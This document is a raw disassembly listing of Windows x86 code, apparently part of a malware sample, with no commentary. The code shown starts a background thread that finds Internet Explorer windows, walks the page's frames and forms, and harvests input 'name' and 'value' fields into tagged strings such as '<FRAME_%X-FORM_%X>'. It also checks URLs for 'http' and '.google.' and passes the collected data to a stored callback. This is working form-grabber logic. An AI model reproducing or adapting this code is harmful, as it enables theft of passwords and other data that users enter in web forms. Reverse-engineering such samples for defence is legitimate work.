var_1001F = byte ptr -1001Fh
var_20 = word ptr -20h
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10024h
call sub_4078CC
push ebx
push esi
push edi
cmp dword_420014, 0FFFFh
jz short loc_404234
and dword_42000C, 0
loc_404234: ; CODE XREF: sub_404211+1A�j
mov eax, dword_42000C
cmp [ebp+arg_4], eax
jz loc_4043AB
mov eax, [ebp+arg_4]
mov dword_42000C, eax
cmp dword_420010, 0
jz short loc_404265
mov eax, dword_420010
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword_420010, 0
loc_404265: ; CODE XREF: sub_404211+40�j
push 0FFFFh
lea eax, [ebp+var_1001F]
push eax
push [ebp+arg_4]
call sub_407B7C ; GetWindowTextA
push 1
push offset aMicrosoftInter ; "Microsoft Internet Explorer"
lea eax, [ebp+var_1001F]
push eax
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jnz short loc_4042A2
and dword_420010, 0
jmp loc_4043AB
; ---------------------------------------------------------------------------
loc_4042A2: ; CODE XREF: sub_404211+83�j
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
cmp [ebp+var_8], 0
jz loc_4043AB
or ebx, ebx
jnz loc_4043AB
and [ebp+var_4], 0
cmp dword_420014, 0FFFFh
jz short loc_4042F6
inc dword_420014
mov eax, [ebp+var_8]
cmp dword_420014, eax
jbe short loc_4042EE
and dword_420014, 0
loc_4042EE: ; CODE XREF: sub_404211+D4�j
mov eax, dword_420014
mov [ebp+var_4], eax
loc_4042F6: ; CODE XREF: sub_404211+C3�j
; sub_404313+8B�j
push 0
call sub_407DC8
pop ecx
mov [ebp+var_20], 2
mov eax, [ebp+var_4]
mov [ebp+var_18], eax
mov dword_420014, eax
lea eax, [ebp+var_C]
push eax
sub_404211 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404313 proc near ; DATA XREF: sub_41D569+1E1�o
lea esi, [ebp-20h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+8]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_404381
push offset dword_420010
push offset dword_4253F8
mov eax, [ebp-0Ch]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz short loc_404381
lea eax, [ebp-10024h]
push eax
mov eax, dword_420010
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
or ebx, ebx
jnz short loc_404381
mov dword_420014, 0FFFFh
mov eax, [ebp+0Ch]
cmp [ebp-10024h], eax
jz short loc_4043AB
loc_404381: ; CODE XREF: sub_404313+1F�j
; sub_404313+3C�j ...
cmp dword_420010, 0
jz short loc_404395
mov eax, dword_420010
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404395: ; CODE XREF: sub_404313+75�j
inc dword ptr [ebp-4]
mov eax, [ebp-8]
cmp [ebp-4], eax
jb loc_4042F6
and dword_420010, 0
loc_4043AB: ; CODE XREF: sub_404211+2B�j
; sub_404211+8C�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_404313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043B0 proc near ; CODE XREF: sub_404ED7+3A�p
var_52640 = byte ptr -52640h
var_52630 = word ptr -52630h
var_52628 = dword ptr -52628h
var_52620 = dword ptr -52620h
var_5261C = byte ptr -5261Ch
var_52618 = dword ptr -52618h
var_52614 = byte ptr -52614h
var_5260C = dword ptr -5260Ch
var_52608 = dword ptr -52608h
var_52604 = dword ptr -52604h
var_52600 = dword ptr -52600h
var_525FA = word ptr -525FAh
var_525F8 = dword ptr -525F8h
var_525F4 = dword ptr -525F4h
var_525E4 = byte ptr -525E4h
var_524CC = dword ptr -524CCh
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10001 = byte ptr -10001h
var_2 = word ptr -2
; FUNCTION CHUNK AT 00404ED2 SIZE 00000005 BYTES
push ebp
mov ebp, esp
mov eax, 6378Ch
call sub_4078CC
push ebx
push esi
push edi
push offset aValue ; "value"
call sub_406E40
mov [ebp+var_10FA8], eax
push offset aName ; "name"
call sub_406E40
mov [ebp+var_10FAC], eax
lea eax, [ebp+var_52614]
push eax
call sub_404184
pop ecx
or eax, eax
jz loc_404ED2
loc_4043F5: ; CODE XREF: sub_4043B0+6E�j
; sub_4043B0+86�j ...
push 0
call sub_407DC8
call sub_407BC4 ; GetForegroundWindow
mov [ebp+var_5260C], eax
push eax
lea eax, [ebp+var_52614]
push eax
call sub_404211
add esp, 0Ch
cmp dword_420010, 0
jz short loc_4043F5
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_420010
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
or ebx, ebx
jnz short loc_4043F5
lea eax, [ebp+var_525F8]
push eax
push offset dword_425398
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_404EB4
lea eax, [ebp+var_52618]
push eax
mov eax, dword_420010
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
or ebx, ebx
jnz loc_404E9F
push offset byte_409130
push [ebp+var_52618]
call sub_404117
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_52620], edi
mov eax, [ebp+var_5260C]
mov ds:dword_419134, eax
lea eax, [ebp+var_525FA]
push eax
mov eax, dword_420010
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
or ebx, ebx
jnz loc_404E9F
cmp [ebp+var_525FA], 0
jnz loc_404E9F
mov [ebp+var_10001], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52600]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
or ebx, ebx
jnz loc_404E9F
lea eax, [ebp+var_5261C]
push eax
mov eax, [ebp+var_52600]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz loc_404E8A
or [ebp+var_524CC], 0FFFFFFFFh
loc_404519: ; CODE XREF: sub_404878+2A8�j
and [ebp+var_52604], 0
and [ebp+var_52608], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_404552
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
or ebx, ebx
jz loc_40460A
jmp loc_404B0E
; ---------------------------------------------------------------------------
loc_404552: ; CODE XREF: sub_4043B0+17E�j
mov [ebp+var_52630], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52628], eax
lea eax, [ebp+var_52640]
push eax
lea eax, [ebp+var_52630]
push eax
mov eax, [ebp+var_52600]
push eax
sub_4043B0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40457C proc near ; DATA XREF: sub_41D569+E0�o
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp-52604h]
push eax
push offset dword_4253C8
mov eax, [ebp-52638h]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_404B0E
lea eax, [ebp-52608h]
push eax
mov eax, [ebp-52604h]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
or ebx, ebx
jz short loc_4045D4
mov eax, [ebp-52604h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_404B0E
; ---------------------------------------------------------------------------
loc_4045D4: ; CODE XREF: sub_40457C+45�j
lea eax, [ebp-525E4h]
push eax
mov eax, [ebp-52608h]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
or ebx, ebx
jz short loc_40460A
mov eax, [ebp-52608h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp-52604h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_404B0E
; ---------------------------------------------------------------------------
loc_40460A: ; CODE XREF: sub_4043B0+197�j
; sub_40457C+6F�j
lea eax, [ebp-525ECh]
push eax
mov eax, [ebp-525E4h]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
or ebx, ebx
jnz loc_404E4B
and dword ptr [ebp-21784h], 0
jmp loc_404AFC
sub_40457C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404878
loc_404633: ; CODE XREF: sub_404878+290�j
push 0
call sub_407DC8
pop ecx
mov word ptr [ebp-62658h], 2
mov eax, [ebp-21784h]
mov [ebp-62650h], eax
lea eax, [ebp-62644h]
push eax
lea esi, [ebp-62658h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp-62658h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp-525E4h]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
or ebx, ebx
jnz loc_404AF6
and dword ptr [ebp-6265Ch], 0
lea eax, [ebp-6265Ch]
push eax
push offset dword_4253A8
mov eax, [ebp-62644h]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_4048E4
lea eax, [ebp-62660h]
push eax
mov eax, [ebp-6265Ch]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
or ebx, ebx
jnz loc_4048E4
lea eax, [ebp-62627h]
push eax
push dword ptr [ebp-62660h]
call sub_404117
add esp, 8
mov edi, eax
inc edi
mov [ebp-6263Ch], edi
and dword ptr [ebp-52624h], 0
jmp short loc_40472E
; ---------------------------------------------------------------------------
loc_404705: ; CODE XREF: sub_404878-13E�j
mov eax, [ebp-52624h]
mov al, [ebp+eax-62627h]
cmp al, 0Dh
jz short loc_40471A
cmp al, 0Ah
jnz short loc_404728
loc_40471A: ; CODE XREF: sub_404878-164�j
mov eax, [ebp-52624h]
mov byte ptr [ebp+eax-62627h], 0
loc_404728: ; CODE XREF: sub_404878-160�j
inc dword ptr [ebp-52624h]
loc_40472E: ; CODE XREF: sub_404878-175�j
mov eax, [ebp-6263Ch]
cmp [ebp-52624h], eax
jb short loc_404705
cmp dword ptr [ebp-524CCh], 0FFFFFFFFh
jnz short loc_404774
push dword ptr [ebp-21784h]
push offset aMainpgForm_X ; "<MAINPG-FORM_%X> "
lea eax, [ebp-6275Fh]
push eax
call sub_407E40
lea eax, [ebp-6275Fh]
push eax
lea eax, [ebp-10001h]
push eax
call sub_407E64
add esp, 14h
jmp short loc_4047A7
; ---------------------------------------------------------------------------
loc_404774: ; CODE XREF: sub_404878-135�j
push dword ptr [ebp-21784h]
push dword ptr [ebp-524CCh]
push offset aFrame_XForm_X ; "<FRAME_%X-FORM_%X> "
lea eax, [ebp-6275Fh]
push eax
call sub_407E40
lea eax, [ebp-6275Fh]
push eax
lea eax, [ebp-10001h]
; END OF FUNCTION CHUNK FOR sub_404878
; =============== S U B R O U T I N E =======================================
sub_40479E proc near ; DATA XREF: sub_41D569+502�o
push eax
call sub_407E64
add esp, 18h
loc_4047A7: ; CODE XREF: sub_404878-106�j
and dword ptr [ebp-52624h], 0
loc_4047AE: ; CODE XREF: sub_40479E+9B�j
mov eax, [ebp-52624h]
lea ecx, [ebp+eax-62627h]
or eax, 0FFFFFFFFh
loc_4047BE: ; CODE XREF: sub_40479E+25�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4047BE
mov [ebp-62630h], eax
cmp eax, 0
jz short loc_4047D7
cmp eax, 0C8h
jbe short loc_4047D9
loc_4047D7: ; CODE XREF: sub_40479E+30�j
jmp short loc_404820
; ---------------------------------------------------------------------------
loc_4047D9: ; CODE XREF: sub_40479E+37�j
cmp dword ptr [ebp-62630h], 1
jnz short loc_4047F2
mov eax, [ebp-52624h]
cmp byte ptr [ebp+eax-62627h], 20h
jz short loc_404820
loc_4047F2: ; CODE XREF: sub_40479E+42�j
push offset asc_4247C0 ; "|"
lea eax, [ebp-10001h]
push eax
call sub_407E64
mov eax, [ebp-52624h]
lea eax, [ebp+eax-62627h]
push eax
lea eax, [ebp-10001h]
push eax
call sub_407E64
add esp, 10h
loc_404820: ; CODE XREF: sub_40479E:loc_4047D7�j
; sub_40479E+52�j
mov eax, [ebp-62630h]
inc eax
add [ebp-52624h], eax
mov eax, [ebp-6263Ch]
cmp [ebp-52624h], eax
jb loc_4047AE
and dword ptr [ebp-62638h], 0
lea ecx, [ebp-10001h]
or eax, 0FFFFFFFFh
loc_40484F: ; CODE XREF: sub_40479E+B6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40484F
mov [ebp-62630h], eax
mov dword ptr [ebp-52624h], 0
jmp short loc_4048C8
sub_40479E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404878
loc_404868: ; CODE XREF: sub_404878+5C�j
mov eax, [ebp-52624h]
cmp byte ptr [ebp+eax-10001h], 20h
jz short loc_40487F
; END OF FUNCTION CHUNK FOR sub_404878
; =============== S U B R O U T I N E =======================================
sub_404878 proc near ; DATA XREF: sub_41D569+55B�o
; FUNCTION CHUNK AT 00404633 SIZE 0000016B BYTES
; FUNCTION CHUNK AT 00404868 SIZE 00000010 BYTES
and dword ptr [ebp-6262Ch], 0
loc_40487F: ; CODE XREF: sub_404878-2�j
cmp dword ptr [ebp-6262Ch], 0
jnz short loc_4048A8
mov eax, [ebp-62638h]
mov edx, [ebp-52624h]
mov dl, [ebp+edx-10001h]
mov [ebp+eax-10001h], dl
inc dword ptr [ebp-62638h]
loc_4048A8: ; CODE XREF: sub_404878+E�j
mov eax, [ebp-52624h]
cmp byte ptr [ebp+eax-10001h], 20h
jnz short loc_4048C2
mov dword ptr [ebp-6262Ch], 1
loc_4048C2: ; CODE XREF: sub_404878+3E�j
inc dword ptr [ebp-52624h]
loc_4048C8: ; CODE XREF: sub_40479E+C8�j
mov eax, [ebp-62630h]
cmp [ebp-52624h], eax
jb short loc_404868
mov eax, [ebp-62638h]
mov byte ptr [ebp+eax-10001h], 0
loc_4048E4: ; CODE XREF: sub_404878-1C0�j
; sub_404878-1A0�j
and dword ptr [ebp-62634h], 0
lea eax, [ebp-62634h]
push eax
push offset dword_4253B8
mov eax, [ebp-62644h]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_404AE1
lea eax, [ebp-62640h]
push eax
mov eax, [ebp-62634h]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
or ebx, ebx
jnz loc_404ACC
and dword ptr [ebp-52628h], 0
jmp loc_404AB8 ; DATA XREF: sub_41D569+41D�r
; ---------------------------------------------------------------------------
loc_40493A: ; CODE XREF: sub_404878+24C�j
push 0
call sub_407DC8
pop ecx
mov word ptr [ebp-62778h], 2
mov eax, [ebp-52628h]
mov [ebp-62770h], eax
lea eax, [ebp-62768h]
push eax
lea esi, [ebp-62778h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp-62778h]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp-62634h]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
or ebx, ebx
jnz loc_404AB2
and dword ptr [ebp-62764h], 0
lea eax, [ebp-62764h]
push eax
push offset dword_4253A8
mov eax, [ebp-62768h]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_404A94
cmp dword ptr [ebp-62764h], 0
jz loc_404A94
lea eax, [ebp-62788h]
push eax
push 0
push dword ptr [ebp-10FA8h]
mov eax, [ebp-62764h]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx ; DATA XREF: sub_41D569+2A�o
jnz loc_404A94
cmp word ptr [ebp-62788h], 8
jnz loc_404A94
movzx edi, word ptr [ebp-2]
mov esi, [ebp-62764h]
mov [ebp+edi*4-10FA4h], esi
movzx edi, word ptr [ebp-2]
mov esi, [ebp-52628h]
mov [ebp+edi*2-1177Ch], si
lea eax, [ebp-62788h]
push eax
push 0
push dword ptr [ebp-10FACh]
mov eax, [ebp-62764h] ; DATA XREF: sub_41DF6A+12�o
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_404A90
lea eax, [ebp-63787h]
push eax
push dword ptr [ebp-62780h]
call sub_404117
add esp, 8
mov edi, eax
inc edi
mov [ebp-6378Ch], edi
cmp byte ptr [ebp-63787h], 0
jz short loc_404A90
cmp edi, 64h
jnb short loc_404A90
lea eax, [ebp-63787h]
push eax
movzx eax, word ptr [ebp-2]
imul eax, 64h
lea eax, [ebp+eax-39E28h]
push eax
call sub_4078EC
loc_404A90: ; CODE XREF: sub_404878+1CF�j
; sub_404878+1F6�j ...
inc word ptr [ebp-2]
loc_404A94: ; CODE XREF: sub_404878+147�j
; sub_404878+154�j ...
cmp dword ptr [ebp-62764h], 0
jz short $+2
cmp dword ptr [ebp-62768h], 0
jz short loc_404AB2
mov eax, [ebp-62768h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404AB2: ; CODE XREF: sub_404878+11A�j
; sub_404878+22C�j
inc dword ptr [ebp-52628h]
loc_404AB8: ; CODE XREF: sub_404878+BD�j
mov eax, [ebp-62640h]
cmp [ebp-52628h], eax
jb loc_40493A
jmp short loc_404AF6
; ---------------------------------------------------------------------------
loc_404ACC: ; CODE XREF: sub_404878+B0�j
cmp dword ptr [ebp-62634h], 0
jz short loc_404AE1
mov eax, [ebp-62634h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404AE1: ; CODE XREF: sub_404878+93�j
; sub_404878+25B�j
cmp dword ptr [ebp-62644h], 0
jz short loc_404AF6
mov eax, [ebp-62644h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404AF6: ; CODE XREF: sub_404878-1ED�j
; sub_404878+252�j ...
inc dword ptr [ebp-21784h]
loc_404AFC: ; CODE XREF: sub_40457C+B2�j
mov eax, [ebp-525ECh]
cmp [ebp-21784h], eax
jb loc_404633
loc_404B0E: ; CODE XREF: sub_4043B0+19D�j
; sub_40457C+25�j ...
inc dword ptr [ebp-524CCh]
mov eax, [ebp-5261Ch]
cmp [ebp-524CCh], eax
jl loc_404519
loc_404B26: ; CODE XREF: sub_404BA0+4E�j
push 0
call sub_407DC8
pop ecx
mov word ptr [ebp-21786h], 0
jmp short loc_404BB7
sub_404878 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404BA0
loc_404B39: ; CODE XREF: sub_404BA0+24�j
lea eax, [ebp-524E0h]
push eax
push 0
push dword ptr [ebp-10FA8h]
movzx edi, word ptr [ebp-21786h]
mov edi, [ebp+edi*4-10FA4h]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_404BB0
lea eax, [ebp-6261Fh]
push eax
push dword ptr [ebp-524D8h]
call sub_404117
add esp, 8
mov edi, eax
inc edi
mov [ebp-62624h], edi
cmp byte ptr [ebp-6261Fh], 0
jz short loc_404BB0
cmp dword ptr [ebp-62624h], 64h
jnb short loc_404BB0
lea eax, [ebp-6261Fh]
push eax
movzx eax, word ptr [ebp-21786h]
; END OF FUNCTION CHUNK FOR sub_404BA0
; =============== S U B R O U T I N E =======================================
sub_404BA0 proc near ; DATA XREF: sub_41DF6A+143�o
; FUNCTION CHUNK AT 00404B39 SIZE 00000067 BYTES
imul eax, 64h
lea eax, [ebp+eax-524C8h]
push eax
call sub_4078EC
loc_404BB0: ; CODE XREF: sub_404BA0-40�j
; sub_404BA0-19�j ...
inc word ptr [ebp-21786h]
loc_404BB7: ; CODE XREF: sub_404878+2BF�j
movzx eax, word ptr [ebp-21786h]
movzx edx, word ptr [ebp-2]
cmp eax, edx
jl loc_404B39
lea eax, [ebp-525FAh]
push eax
mov eax, dword_420010
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
or ebx, ebx
jnz loc_404E9F
cmp word ptr [ebp-525FAh], 0
jz loc_404B26
mov byte ptr [ebp-2177Dh], 0
push offset byte_409130
lea eax, [ebp-2177Dh]
push eax
call sub_4078EC
mov dword ptr [ebp-525E8h], 1
mov word ptr [ebp-1177Eh], 0
jmp loc_404CC6
; ---------------------------------------------------------------------------
loc_404C24: ; CODE XREF: sub_404BA0+133�j
movzx eax, word ptr [ebp-1177Eh]
imul eax, 64h
cmp byte ptr [ebp+eax-524C8h], 0
jz loc_404CBF
and dword ptr [ebp-525E8h], 0
movzx eax, word ptr [ebp-1177Eh]
push eax
push offset asc_4247BB ; " %X:"
lea eax, [ebp-525DFh]
push eax
call sub_407E40
lea eax, [ebp-525DFh]
push eax
lea eax, [ebp-2177Dh]
push eax
call sub_407E64
movzx eax, word ptr [ebp-1177Eh]
imul eax, 64h
lea eax, [ebp+eax-39E28h]
push eax
lea eax, [ebp-2177Dh]
push eax
call sub_407E64
push offset asc_4247B9 ; ":"
lea eax, [ebp-2177Dh]
push eax
call sub_407E64
movzx eax, word ptr [ebp-1177Eh]
imul eax, 64h
lea eax, [ebp+eax-524C8h]
push eax
lea eax, [ebp-2177Dh]
push eax
call sub_407E64
add esp, 2Ch
loc_404CBF: ; CODE XREF: sub_404BA0+96�j
inc word ptr [ebp-1177Eh]
loc_404CC6: ; CODE XREF: sub_404BA0+7F�j
movzx eax, word ptr [ebp-1177Eh]
movzx edx, word ptr [ebp-2]
cmp eax, edx
jl loc_404C24
cmp dword ptr [ebp-525E8h], 0
jnz loc_404E4B
push offset asc_424E5F ; " "
lea eax, [ebp-2177Dh]
push eax
call sub_407E64
lea eax, [ebp-10001h]
push eax
lea eax, [ebp-2177Dh]
push eax
call sub_407E64
add esp, 10h
cmp ds:byte_409130, 68h
jnz short loc_404D31
cmp ds:byte_409131, 74h
jnz short loc_404D31
cmp ds:byte_409132, 74h
jnz short loc_404D31
cmp ds:byte_409133, 70h
jz short loc_404D36
loc_404D31: ; CODE XREF: sub_404BA0+174�j
; sub_404BA0+17D�j ...
jmp loc_404E05
; ---------------------------------------------------------------------------
loc_404D36: ; CODE XREF: sub_404BA0+18F�j
push 1
push offset a_google_ ; ".google."
push offset byte_409130
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jz short sub_404D70
push 1
push offset a_google_adware ; ".google.adware"
push offset byte_409130
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_404E05
sub_404BA0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404D70 proc near ; CODE XREF: sub_404BA0+1AF�j
; DATA XREF: .data:0041D305�o
mov word ptr [ebp-525EEh], 0
loc_404D79: ; CODE XREF: sub_404DE5+F�j
push 1
movzx eax, word ptr [ebp-525EEh]
lea eax, ds:42001Ch[eax]
push eax
push offset byte_409130
call sub_401429
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_404DAF
push 1
lea eax, [ebp-2177Dh]
push eax
call ds:dword_408118
jmp short loc_404E05
; ---------------------------------------------------------------------------
loc_404DAF: ; CODE XREF: sub_404D70+2C�j
movzx eax, word ptr [ebp-525EEh]
mov [ebp-52624h], eax
lea ecx, ds:42001Ch[eax]
or eax, 0FFFFFFFFh
loc_404DC6: ; CODE XREF: sub_404D70+5B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_404DC6
mov esi, [ebp-52624h]
add esi, eax
mov edi, esi
mov [ebp-525EEh], di
inc word ptr [ebp-525EEh]
sub_404D70 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_404DE5 proc near ; DATA XREF: sub_41D07D:loc_41D0E2�o
movzx eax, word ptr [ebp-525EEh]
cmp byte_42001C[eax], 0
jnz short loc_404D79
push 0
lea eax, [ebp-2177Dh]
push eax
call ds:dword_408118
loc_404E05: ; CODE XREF: sub_404BA0:loc_404D31�j
; sub_404BA0+1CA�j ...
mov word ptr [ebp-21788h], 0
jmp short loc_404E3C
; ---------------------------------------------------------------------------
loc_404E10: ; CODE XREF: sub_404DE5+64�j
movzx edi, word ptr [ebp-21788h]
cmp dword ptr [ebp+edi*4-10FA4h], 0
jz short loc_404E35
movzx edi, word ptr [ebp-21788h]
mov edi, [ebp+edi*4-10FA4h]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_404E35: ; CODE XREF: sub_404DE5+3A�j
inc word ptr [ebp-21788h]
loc_404E3C: ; CODE XREF: sub_404DE5+29�j
movzx eax, word ptr [ebp-21788h]
movzx edx, word ptr [ebp-2]
cmp eax, edx
jl short loc_404E10
loc_404E4B: ; CODE XREF: sub_40457C+A5�j
; sub_404BA0+140�j
cmp dword ptr [ebp-525E4h], 0
jz short loc_404E60
mov eax, [ebp-525E4h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404E60: ; CODE XREF: sub_404DE5+6D�j
cmp dword ptr [ebp-52608h], 0
jz short loc_404E75
mov eax, [ebp-52608h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404E75: ; CODE XREF: sub_404DE5+82�j
cmp dword ptr [ebp-52604h], 0
jz short loc_404E8A
mov eax, [ebp-52604h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404E8A: ; CODE XREF: sub_4043B0+15C�j
; sub_404DE5+97�j
cmp dword ptr [ebp-52600h], 0
jz short loc_404E9F
mov eax, [ebp-52600h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404E9F: ; CODE XREF: sub_4043B0+C4�j
; sub_4043B0+107�j ...
cmp dword ptr [ebp-525F8h], 0
jz short loc_404EB4
mov eax, [ebp-525F8h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_404EB4: ; CODE XREF: sub_4043B0+A8�j
; sub_404DE5+C1�j
cmp dword ptr [ebp-525F4h], 0
jz loc_4043F5
mov eax, [ebp-525F4h]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_4043F5
sub_404DE5 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4043B0
loc_404ED2: ; CODE XREF: sub_4043B0+3F�j
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4043B0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404ED7 proc near ; DATA XREF: sub_404F53+15�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset word_42001E
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
loc_404F04: ; CODE XREF: sub_404ED7+46�j
; sub_404ED7+61�j
push 1F4h
call sub_407DC8
add esp, 4
call sub_4043B0
cmp dword_420018, 0
jnz short loc_404F04
jmp short loc_404F41
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_404F41
; ---------------------------------------------------------------------------
mov [ebp+var_1C], 1
mov eax, [ebp+var_1C]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
jmp short loc_404F04
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_404F41: ; CODE XREF: sub_404ED7+48�j
; sub_404ED7+51�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
sub_404ED7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F53 proc near ; CODE XREF: sub_406344+441�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push edi
mov eax, [ebp+arg_0]
mov ds:dword_408118, eax
push offset dword_420018
push 0
push 0
push offset sub_404ED7
push 0
push 0
call sub_407B64 ; CreateThread
mov edi, eax
push edi
call sub_407984 ; CloseHandle
pop edi
pop ebp
retn
sub_404F53 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
cmp dword_420010, 0
jnz short loc_404F92
xor eax, eax
jmp short loc_404FCB
; ---------------------------------------------------------------------------
loc_404F92: ; CODE XREF: .text:00404F8C�j
mov eax, ds:dword_419134
cmp [ebp+8], eax
jz short loc_404FA0
xor eax, eax
jmp short loc_404FCB
; ---------------------------------------------------------------------------
loc_404FA0: ; CODE XREF: .text:00404F9A�j
lea ecx, byte_409130
or eax, 0FFFFFFFFh
loc_404FA9: ; CODE XREF: .text:00404FAE�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_404FA9
mov edi, eax
add edi, 1
push edi
push offset byte_409130
push dword ptr [ebp+0Ch]
call sub_407E04
add esp, 0Ch
mov eax, 1
loc_404FCB: ; CODE XREF: .text:00404F90�j
; .text:00404F9E�j
pop edi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FCE proc near ; DATA XREF: sub_406344+43C�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_4], ebx
mov [ebp+var_C], ebx
loc_404FDF: ; CODE XREF: sub_404FCE+10C�j
; sub_404FCE+117�j ...
mov eax, [ebp+arg_0]
